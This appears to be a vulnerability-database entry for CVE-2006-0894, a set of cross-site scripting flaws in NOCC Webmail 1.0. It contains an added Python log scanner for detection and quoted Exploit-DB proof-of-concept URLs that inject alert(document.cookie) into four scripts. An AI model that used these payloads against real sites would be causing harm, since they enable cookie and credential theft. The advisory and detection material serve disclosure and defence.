CVE-2006-0894
Published: 2006-02-25
Priority: P4 · 19 · medium · 4.3 (CVSS 2.0)
CVSS 2.0 vector: AV:N/AC:M/Au:N/C:N/I:P/A:N
EXPLOIT
EPSS: 2.63% (83.6th percentile)
Multiple cross-site scripting (XSS) vulnerabilities in NOCC Webmail 1.0 allow remote attackers to inject arbitrary web script or HTML via (1) the html_error_occurred parameter in error.php, (2) html_filter_select parameter in filter_prefs.php, (3) html_no_mail parameter in no_mail.php, the (4) page_line, (5) prev, and (6) next parameters in html_bottom_table.php, and the (7) _SESSION['nocc_theme'] parameter in footer.php.
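A defender-side check for the vectors listed above, as an added example that is not part of the original advisory or of NOCC itself: it scans web-server access logs for requests to the named scripts that supply the named parameters and reports whether the value carries HTML metacharacters. The log lines, the `/webmail` prefix and the `_SESSION[nocc_theme]` query-key form are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Script -> parameters, as listed in the CVE-2006-0894 description.
VECTORS = {
    "error.php": {"html_error_occurred"},
    "filter_prefs.php": {"html_filter_select"},
    "no_mail.php": {"html_no_mail"},
    "html_bottom_table.php": {"page_line", "prev", "next"},
    # Assumption: the session entry appears as a _SESSION[...] array key.
    "footer.php": {"_SESSION[nocc_theme]"},
}
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
MARKUP_RE = re.compile(r"[<>\"']")


def check_line(line):
    """Return (path, param, has_markup) for each listed parameter seen."""
    match = REQUEST_RE.search(line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    watched = VECTORS.get(url.path.rsplit("/", 1)[-1], set())
    hits = []
    for key, value in parse_qsl(url.query, keep_blank_values=True):
        key = key.replace("'", "").replace('"', "")  # _SESSION['x'] == _SESSION[x]
        if key in watched:
            # parse_qsl decoded once; decode again for double-encoded markup.
            hits.append((url.path, key, bool(MARKUP_RE.search(unquote(value)))))
    return hits


def scan(lines):
    """Return only the hits whose value carries HTML metacharacters."""
    return [hit for line in lines for hit in check_line(line) if hit[2]]


# Constructed access-log lines (combined log format); not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [25/Feb/2006:10:00:00 +0000] "GET /webmail/html/error.php'
    '?html_error_occurred=%3Cb%3Etest%3C%2Fb%3E HTTP/1.1" 200 512',
    '192.0.2.11 - - [25/Feb/2006:10:00:05 +0000] "GET /webmail/html/'
    'html_bottom_table.php?page_line=2&next=3 HTTP/1.1" 200 734',
    '192.0.2.12 - - [25/Feb/2006:10:00:09 +0000] "GET /webmail/index.php'
    '?lang=en HTTP/1.1" 200 2048',
    '192.0.2.13 - - [25/Feb/2006:10:00:12 +0000] "GET /webmail/html/footer.php'
    '?_SESSION%5Bnocc_theme%5D=%253Ci%253E HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

`check_line` also returns requests whose values are clean, which is useful when these template fragments should never be requested directly; `scan` narrows the result to values containing markup.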
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| nocc | nocc | — | — |
No detection rules found.
Exploit-DB
NOCC 1.0 - 'filter_prefs.php?html_filter_select' Cross-Site Scripting
exploitdb·2006-02-23
---
source: https://www.securityfocus.com/bid/16793/info
NOCC Webmail is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker can exploit these issues to inject arbitrary PHP code and execute it in the context of the vulnerable webserver. An attacker can also exploit these issues to execute arbitrary HTML or script code in the browser of a victim user in the context of the webserver process. This may facilitate the theft of cookie-based authentication credentials; other attacks are also possible.
http://www.example.com/[path]/html/filter_prefs.php?html_filter_select=alert(document.cookie)
Exploit-DB
NOCC 1.0 - 'html_bottom_table.php' Multiple Cross-Site Scripting Vulnerabilities
exploitdb·2006-02-23
---
source: https://www.securityfocus.com/bid/16793/info
http://www.example.com/[path]/html/html_bottom_table.php?page_line=alert(document.cookie)
http://www.examp
Exploit-DB
NOCC 1.0 - 'error.php?html_error_occurred' Cross-Site Scripting
exploitdb·2006-02-23
---
source: https://www.securityfocus.com/bid/16793/info
http://www.example.com/[path]/html/error.php?html_error_occurred=alert(document.cookie)
Exploit-DB
NOCC 1.0 - 'no_mail.php?html_no_mail' Cross-Site Scripting
exploitdb·2006-02-23
---
source: https://www.securityfocus.com/bid/16793/info
http://www.example.com/[path]/html/no_mail.php?html_no_mail=alert(document.cookie)
No writeups or analysis indexed.
References
http://archives.neohapsis.com/archives/bugtraq/2006-02/0418.html
http://retrogod.altervista.org/noccw_10_incl_xpl.html
http://secunia.com/advisories/16921
http://securitytracker.com/id?1015671
http://www.osvdb.org/23423
http://www.osvdb.org/23424
http://www.osvdb.org/23425
http://www.osvdb.org/23426
http://www.osvdb.org/23427
http://www.securityfocus.com/bid/16793
Published: 2006-02-25